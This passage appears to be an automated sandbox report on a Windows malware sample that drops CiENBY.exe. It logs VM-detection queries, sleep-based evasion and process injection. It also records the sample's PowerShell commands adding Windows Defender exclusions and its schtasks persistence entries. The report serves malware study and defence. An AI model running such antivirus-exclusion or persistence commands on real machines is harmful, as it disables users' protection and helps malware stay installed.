                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 4D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 7D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 8D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 8F40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 9F40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 1370000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 2E00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 4E00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 7800000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 8800000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 89A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 99A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 2630000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 2840000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory allocated: 2660000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7641Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7727Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 355Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWindow / User API: threadDelayed 3698Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWindow / User API: threadDelayed 3203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWindow / User API: threadDelayed 2121
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWindow / User API: threadDelayed 5579
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe TID: 6288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep count: 7641 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 241 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe TID: 7644Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe TID: 7332Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe TID: 7272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe TID: 7360Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe TID: 7952Thread sleep time: -25825441703193356s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe TID: 7836Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe TID: 7800Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeThread delayed: delay time: 922337203685477
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1973680913.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeMemory written: C:\Users\user\Desktop\PZNfhfaj9O.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMemory written: C:\Users\user\AppData\Roaming\CiENBY.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp"
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess created: C:\Users\user\AppData\Roaming\CiENBY.exe "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Users\user\Desktop\PZNfhfaj9O.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
